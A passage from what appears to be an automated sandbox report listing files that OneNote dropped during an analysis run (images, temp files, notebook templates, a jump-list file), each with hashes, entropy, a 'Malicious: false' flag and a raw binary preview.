SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Temp\{F8174C8D-7632-4F07-943E-904FB6F7F6F7}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Temp\{F8821866-D0C6-49E9-B04F-31F24ED5BC60}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
Category:	dropped
Size (bytes):	3428
Entropy (8bit):	7.766473352510893
Encrypted:	false
SSDEEP:	96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
MD5:	EE9E2DF458733B61333E8A82F7A2613D
SHA1:	A86704C969F51B86D6A05ED51C6C60214ED9FA89
SHA-256:	BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
SHA-512:	BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v....q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

C:\Users\user\AppData\Local\Temp\{F958B48C-9A68-4D46-A2F6-86781A328AD2}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Temp\{FA14C6AF-8785-49BF-8F7C-8EC2E1D76F96}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{FCF7472E-BDFD-46DB-BA2A-FEB7656C9013}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Temp\{FF6F567D-D01D-4C65-8696-51E1FFEFD3E8}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Temp\~DF1C06499AF9F1208B.TMP

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0439214194697946
Encrypted:	false
SSDEEP:	12:RadBYyfHjqy8hUnSkQRQQ01+W6/1D9aDqsMAxMDXIxAS:YjYyfHeySTQQ/jDlAWDCAS
MD5:	1336BD2AAA4DE969A9C599C798E9BD40
SHA1:	4220C80B00F8C98C19D22BF341D208EF2FE12C3A
SHA-256:	9A6A10E1EB2C3F9129860F8A878D2213147C1CDE5732FC510A81459D0F09103E
SHA-512:	C8AA8521CCFAA97E2E791C77ECB937A45B7906D0989252148A75E9341731F3CA8366E1265D7F677BD078CFE2012156C60E124B4429ECC07338E8F89A2A77F489
Malicious:	false
Preview:	./.C..vL....W"v_..9.j.{O.q.....................?.....I........................................................................`.p2L.I..s...w]A.......................h.............................................e. ..F...............8..k*W.F.l..:..............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2287073014945917
Encrypted:	false
SSDEEP:	24:YpYyfhQdfS5QQPflFkIA+CASc13l8kb3e:+nhGfS5QQPdFxAHSiuO
MD5:	14E4A25B864AD3EF1415C86BFFC8042E
SHA1:	CDA1746921ED01E50BA951FF8998483629F9E55A
SHA-256:	04E7213151C962FF1C24D3DB76F70FACDD766753CB3CA477C22D578F5A01AB21
SHA-512:	7C36596EF3D707191AAFE2F3501D59CDD288F51B8EFC097A125AADFFF8353EDCE2187AA4815B111F07D182BD11CEF3D23FF9B2B9A232ABA1D91250759EE39C01
Malicious:	false
Preview:	./.C..vL....W"v_.`.p2L.I..s...w]................?.....I..........................................................................`8.B....X....!wY....................h...........................................i>....%K..kx.E.4..............QO...=.f4F.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6496
Entropy (8bit):	1.5178913467563895
Encrypted:	false
SSDEEP:	24:YhQdvYyfmUl/QRQQkQxuZQx58PZQxSfQx9i/DCASuRmnSq0kNfCnX/T6Nrua:KGvnmymQQbcKjKKUIvi/O/NOmd
MD5:	BB51B3A1B72C2239850175CE807DDC6F
SHA1:	9EB8FCEE96838E00C7DD35193007AA4AF7D1F06E
SHA-256:	F416D2898496B9BF5DB4FB609986AF0EB04DC268E278BDAE0660F6B6D1D32F2B
SHA-512:	C583173D7EC9EA924B7DA779004E48CBD8960CD6B27E037E9AE9189F5D9DD4C52EAC24F7FE47CF5F5F42654C39B04D958F8C826F28F0AFBCCFBAFAD3F025DA28
Malicious:	false
Preview:	./.C..vL....W"v_...`8.B....X...................?.....I.......................................................................2\|.H..?H...R#>k...H.....................h...........................`.................;....O......D.............::HK...M...X.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.043286508210669
Encrypted:	false
SSDEEP:	12:Radka+lbYyfHj4ChUnSaH5EkUQQS9i4kRXkREW6/lkRBxDkRGHTrdrUXIxAS:YdkaabYyfHYSi5WQQS9MgxfzruCAS
MD5:	E7EAFDB9D4237D317CC277FDC98A9C39
SHA1:	88907A9955B4E7803BC5EFAACF01EB4BC4420954
SHA-256:	8A0A0BE288277704BB5263BFFF71106C25F76B6BE726C5F8CB54446DC9091DF3
SHA-512:	7770A538524C5BC4B2415EE9A09237DE2DDF5B1F6B4DE33C72B479A247AC196FC72F339C19991F7F33FF3B3709C943B77C3007BB86BDC2D91272790C8F21F8BB
Malicious:	false
Preview:	./.C..vL....W"v_W......J.a(..<\|.................?.....I........................................................................n.A..J..o.n..A.......................h............................................X...2.O..U.~.;..........u...y.L.}G..[4g.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2297662919697787
Encrypted:	false
SSDEEP:	12:RansYyfi4QdgUXEqlXEDQQ7VeV+Wn+J/eVDWVOm0F+UXIxASDk1G/HlDqAYdnIB:YsYyfhQd7TSQQffAiUCASc6Hlade
MD5:	39140E225FC45BFFE9D7DC81929B45D8
SHA1:	DEDA788AB6E65191803138F4C8E0079DE092BDAE
SHA-256:	BDEEC9A76BAD783C24E663C44E489623393C7F0B75DC835E0C5A6C2BBC827AB7
SHA-512:	CA32003BC3F8A00A208813D3CE9F7CFD84F273DA77418891E8CE915F5DDFE89465CB0EA7884C91AFF53CD1DCC975420D90B660568521D27099E342A439AF6092
Malicious:	false
Preview:	./.C..vL....W"v_.n.A..J..o.n..................?.....I..........................................................................`8.B....X......}....................h...........................................C.`B..YL.....[............[..0L.bU.gRO..............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0390699608640352
Encrypted:	false
SSDEEP:	12:Ra1gYyfHj4QdeKRUnS3tPQQMBCgKaCM2W6/nCgXvCMW2z8HPObXIxAS:Y1gYyfHcQderS9QQMBlN2NJvNOvObCAS
MD5:	F547543D1DCC6E5DF104C923ED2022AA
SHA1:	5DA7ADEEC95B723B61E8C01F599D288ED7E32667
SHA-256:	AD98CA3CA1C0618F0513B0294806DEBF0484E8B96DFF7AA409200E0344C91255
SHA-512:	9CEB3DD64C587AF53BA88398C441673B3982412EA5A6FB38A7539D9E939465CFD8364741878FA5D9A4F4F242D129D9848FFD7A7500C0B49574D488A9131069F0
Malicious:	false
Preview:	./.C..vL....W"v_...z.N.J.u...................?.....I..........................................................................`8.B....X...F..6....................h...........................................,.k.W.UL..hK.>n.........S ..9~D.<R..[]..............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5040
Entropy (8bit):	1.0350727738937195
Encrypted:	false
SSDEEP:	12:Ra1yVuYyfHjFxhUnSNr3UnnQQKDgCYW6/SCFaCkXIxAS:Y1zYyfH58S1mQQKMCYwCFaCkCAS
MD5:	27A58B6E9B6D82490D7C254997ABFDF8
SHA1:	9FC4D677F485F70A16F9D90639FBFC6D808F3FD6
SHA-256:	F0A285EB2A80443CFF9607B554DEBE4F1F321C72CDDA5BE86AE8561492C1372C
SHA-512:	9F98FB77EAE670EF9B1C43E24425E08FAA37ED90372B99F9891CD6855EF7737C3B5C12780F67F7C623A9E5684CCE22FB453814375E263CF60ABE67A2545DA75C
Malicious:	false
Preview:	./.C..vL....W"v_......K.cV....T................?.....I.........................................................................\|T...C..../.AA.......................h............................................J2.Rm.E.q..M...........{./...L..fD#................................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2200174305116007
Encrypted:	false
SSDEEP:	24:YsRYyfhQdgl5XwtQQbVpV5fkVSWVdXCAScTlnjZe:tnhGglpoQQnNeyIxjM
MD5:	66D894B398CADEA4964AE32ED4D78308
SHA1:	054D2A18900C9C22560C9B419BD0B4178173990C
SHA-256:	93E3C5A17944F80A1CC769631D30D6E11431146BC36C44CDBDE083EBC8392631
SHA-512:	9F118951E72DCDB547DFF8094DDBAA48F491F2F0C50845AB81D587AC6D620F34C66A546CD4F11DFCD876B7719A1CDEBE19D3BAEED9DBE932895EFC2B0DE6F685
Malicious:	false
Preview:	./.C..vL....W"v_..\|T...C..../.A................?.....I..........................................................................`8.B....X..........................h............................................w.B`A.@.. ............~....H....&................................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6152
Entropy (8bit):	1.2374944781781956
Encrypted:	false
SSDEEP:	24:YmCYyfKmQQnfWB6vMCASk0QdgJbAGbgcFl:FCnKmQQnuW9DGgJkGX
MD5:	3F553C68C1D6AC8E8E3D542B8421C739
SHA1:	CC8358791A06D12A3592005C1E7873F848CFEA77
SHA-256:	897DC32A9D27195DC31EFE7318A9FC35189A854C7CCB9EC4D2CD3291CDAE133E
SHA-512:	33E6DF758B3A133E36B90D2EC87DCBB9E6EA61F769ED0BE36F69C22A7C5D7BEE91D5CDDF9699897F59E1371F82F94C4B8AFECAEA6AE832EDC7DE8770C440B868
Malicious:	false
Preview:	./.C..vL....W"v_2\|.H..?H...R#>k.................?.....I........................................................................E".J.`G..Y...........................h...............................................0Z.A.....lK8..........bye..A.....................................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	1.2241976000520682
Encrypted:	false
SSDEEP:	12:RagbYyfivEpUX9nhtQQh+oWn+J/kyyGEL7BXIxASDk1uqKotMO5QEA6jnIB:YgbYyf9WjtQQAofyyqL7BCASc7Rbi8je
MD5:	9CE469E8629464FF6CF77AE9ECD6DA02
SHA1:	A37F395FB30C93A9E06D62A013BE602DC1D2CFF9
SHA-256:	CF6443A79104D3882DB015B66D5CD7F0EB2ABA0BE31A207C20A2CDB276B0A767
SHA-512:	840EE362F0037F781146558D471D0C1C17280FB4F815D62BCBB0FF4DBFC675418544D97D0F0398E72424218A3A2DCA873648DBDD557DABD3E9EFF17148AEAD95
Malicious:	false
Preview:	./.C..vL....W"v_.E".J.`G..Y....................?.....I.......................................................................$0...Y.J.>;K...f...7....................h...........................................Q...CJ...}^............, .S.)B.f.5.N.C.............................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Templates\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6168
Entropy (8bit):	1.2135963477006324
Encrypted:	false
SSDEEP:	24:Y99jYyf1AEQQsUAMfwApf7tXLCASPN0VHtuNlQ:y9jn1AEQQsUAMIApfhmkNuA
MD5:	740FE38B6A0F896610A306C10C3BA643
SHA1:	6748EA5B6B792F000D590E2C3617FCE5EA89601A
SHA-256:	B0724D5DFF274A82817A1CAFFF0D7E010FB80F62EA03528E094F301B484CDF00
SHA-512:	CA3B9CECD2D2FD40E6646A6A3DF1F2753CC0A5336DF436CCE2D6EBC2B0589729BD19D60AF3AC3F956B0AA6AB1B4E3B828F19BF693EDF8A4D3A4138F8F7973CE5
Malicious:	false
Preview:	./.C..vL....W"v_$0...Y.J.>;K...f................?.....I...............................................................................................................h...........................................$....h.J.:.{Ne.-........D"..N.)B.&..K................................f.<.f.<.f.<.f.<................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3999
Entropy (8bit):	3.5364250825445263
Encrypted:	false
SSDEEP:	48:Ih2jd7fk67OIdN5DMJC5ydfdHd7fk6UuzckydNZGcG7CZYgn:IYfcaMjdfnfT59jDE
MD5:	B8B870A22FCB2C059E93656596A0719F
SHA1:	B08CED048147DEB6B0EB724D1FED7BFAA391618B
SHA-256:	B1337531205B8CC04542C77C176A8680DA170ABC351CE4960D66C42A70C6727F
SHA-512:	C1B5A5BE6AD992DB511130B8F91378D95987B9EEE443C4AAA2BE562B1C458B0A301FB9027D037D052804A4D493853A27FB75C5B750101D3F907CF86AFA013720
Malicious:	false
Preview:	...................................FL..................F.@.. ....D.F.S..H$lj.;...D.F.S..@......................./....P.O. .:i.....+00.../C:\.....................1......R.y..PROGRA~1..t......sN.&GV\.....B...............J.......b.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1......R....MICROS~2..R......R..GVa...........................@E$.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1......R....root..:......R..GV\..............................r.o.o.t.....Z.1......R....Office16..B......R..GV\.....t......................c?.O.f.f.i.c.e.1.6.....b.2.@....R\|. .ONENOTE.EXE.H......R\|.GVg.....'......................a^.O.N.E.N.O.T.E...E.X.E.......j...............-.......i...........;S.......C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.;.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.R.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Root\Office16

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1bc9bbbe61f14501.customDestinations-ms~RF2b57b.TMP (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3999
Entropy (8bit):	3.5364250825445263
Encrypted:	false
SSDEEP:	48:Ih2jd7fk67OIdN5DMJC5ydfdHd7fk6UuzckydNZGcG7CZYgn:IYfcaMjdfnfT59jDE
MD5:	B8B870A22FCB2C059E93656596A0719F
SHA1:	B08CED048147DEB6B0EB724D1FED7BFAA391618B
